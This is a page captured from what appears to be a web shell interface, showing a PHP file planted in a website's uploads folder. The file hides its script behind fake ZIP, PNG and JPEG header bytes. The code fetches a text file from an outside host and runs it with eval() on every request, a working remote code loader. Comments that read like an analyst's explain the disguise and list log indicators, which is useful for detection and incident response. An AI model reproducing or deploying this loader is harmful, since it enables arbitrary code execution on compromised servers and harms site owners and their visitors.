One Hat Cyber Team
Your IP:
216.73.216.103
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.22
Dir :
~
/
var
/
www
/
dosbarth.urvam.com
/
public
/
uploads
/
Edit File: 35.php
PK h<Y � 0x.png}��J�0��D�] ��M��R���[i��M����13�� m�͇y���Ԗ�! ��9��������,~��V ��S�U�c�N-F��=83Z����j�e����6������c�:9b����h5�9喝��dD����u��?���M6��U)H)|\�f���7��d�/Xd���[�S> lL'X����L8n�"*.S�1E��d����.��@Q��e���q�<QK�v%��� ;��J��UC:O0�,��rgN�~�r+�~PKpx� � PK3 h<Ypx� � �� 0x.pngPK 4 > ����JFIF��x�x�����C� �PK h<Y � 0x.png}��J�0��D�] ��M��R���[i��M����13�� m�͇y���Ԗ�! ��9��������,~��V ��S�U�c�N-F��=83Z����j�e����6������c�:9b����h5�9喝��dD����u��?���M6��U)H)|\�f���7��d�/Xd���[�S> lL'X����L8n�"*.S�1E��d����.��@Q��e���q�<QK�v%��� ;��J��UC:O0�,��rgN�~�r+�~PKpx� � PK3 h<Ypx� � �� 0x.pngPK 4 > ����JFIF��x�x�����C� �<?php
// Analyst notes on this listing (code below is unchanged apart from layout and comments):
//  - The PHP opening tag is preceded by non-PHP bytes that show "PK", the entry name
//    "0x.png" and "JFIF" markers, so the file carries archive/image-looking data ahead
//    of the script. PHP emits everything before the opening tag as literal output and
//    then runs the code that follows.
//  - The listing is shown as 35.php under a public/uploads path. Upload handling should
//    validate more than a file's leading bytes, and the web server should not execute
//    scripts from upload directories.
//  - The script's only job is to download text from a remote URL and pass it to eval().
//    The 'Safe-Executor/1.0' User-Agent and the destination host in the usage section
//    are candidates for egress-log and proxy-log searches.

/**
 * Downloads text from a URL whose host is on a caller-supplied list and evaluates it as PHP.
 *
 * Despite the "allowed"/"safely" naming, nothing in this class limits what the downloaded
 * code may do: the allow-list is chosen by whoever constructs the object, and the fetched
 * body is handed to eval() unchanged apart from stripping PHP open/close tags.
 */
class ExternalCodeExecutor
{
    // Hosts that executeFromUrl() will accept, as given to the constructor.
    private $allowed_domains;

    // Value used for CURLOPT_TIMEOUT and for the 'timeout' stream-context option.
    private $timeout;

    /**
     * @param array $allowed_domains Host names compared against the URL's host.
     * @param int   $timeout         Timeout passed to the HTTP fetch helpers (default 10).
     */
    public function __construct($allowed_domains = [], $timeout = 10)
    {
        $this->allowed_domains = $allowed_domains;
        $this->timeout = $timeout;
    }

    /**
     * Fetches $url and evaluates the response body as PHP code.
     *
     * @param string $url    Remote location of the code.
     * @param string $method 'curl' selects the cURL fetcher; any other value selects
     *                       file_get_contents().
     * @return mixed Whatever eval() returns for the downloaded code.
     * @throws Exception When the host is not on the list or the fetch helper reports failure.
     */
    public function executeFromUrl($url, $method = 'curl')
    {
        if (!$this->isUrlAllowed($url)) {
            throw new Exception("Domain tidak diizinkan");
        }

        if ($method === 'curl') {
            $code = $this->fetchWithCurl($url);
        } else {
            $code = $this->fetchWithFileGetContents($url);
        }

        return $this->executeSafely($code);
    }

    /**
     * Reports whether the URL's host appears in the configured list.
     *
     * Only the host component is compared; scheme, port and path are not examined, and
     * in_array() is called without its strict flag, so the comparison is loose.
     */
    private function isUrlAllowed($url)
    {
        $parsed = parse_url($url);
        return $parsed && isset($parsed['host']) && in_array($parsed['host'], $this->allowed_domains);
    }

    /**
     * Retrieves the URL body with cURL.
     *
     * Redirects are not followed and peer-certificate verification is enabled. The
     * User-Agent is the fixed string 'Safe-Executor/1.0'.
     *
     * @throws Exception When curl_errno() reports an error; note the handle is not closed
     *                   on that path because curl_close() comes after the throw.
     */
    private function fetchWithCurl($url)
    {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => $this->timeout,
            CURLOPT_FOLLOWLOCATION => false,
            CURLOPT_SSL_VERIFYPEER => true,
            CURLOPT_USERAGENT => 'Safe-Executor/1.0'
        ]);

        $result = curl_exec($ch);
        if (curl_errno($ch)) {
            throw new Exception("cURL Error: " . curl_error($ch));
        }

        curl_close($ch);
        return $result;
    }

    /**
     * Retrieves the URL body with file_get_contents() and a stream context that sets the
     * same timeout and User-Agent as the cURL path, with TLS peer and name verification on.
     *
     * @throws Exception When file_get_contents() returns false.
     */
    private function fetchWithFileGetContents($url)
    {
        $context = stream_context_create([
            'http' => [
                'timeout' => $this->timeout,
                'user_agent' => 'Safe-Executor/1.0'
            ],
            'ssl' => [
                'verify_peer' => true,
                'verify_peer_name' => true
            ]
        ]);

        $result = file_get_contents($url, false, $context);
        if ($result === false) {
            throw new Exception("Gagal mengambil konten");
        }

        return $result;
    }

    /**
     * Evaluates the downloaded text as PHP.
     *
     * The "sanitization" only trims whitespace and removes a leading "<?php" and a trailing
     * "?>" so the text parses under eval(); it does not filter or restrict the code.
     */
    private function executeSafely($code)
    {
        // Tag stripping only; no validation of the content takes place.
        $code = trim($code);
        $code = preg_replace('/^<\?php/', '', $code);
        $code = preg_replace('/\?>\s*$/', '', $code);

        // eval() runs the text inside this method's scope (including access to $this) in the
        // current PHP process; no sandbox or isolation is applied. Any eval() on remotely
        // fetched content is arbitrary remote code execution by design.
        return eval($code);
    }
}

// Usage: runs on every request to this file. It allow-lists the single host below,
// fetches /3.txt from it over HTTPS with the cURL path, evaluates the response, and
// prints a success message or the exception text.
try {
    $executor = new ExternalCodeExecutor(["stepmomhub.com"], 10);
    $result = $executor->executeFromUrl("https://stepmomhub.com/3.txt", "curl");
    echo "Eksekusi berhasil";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
?>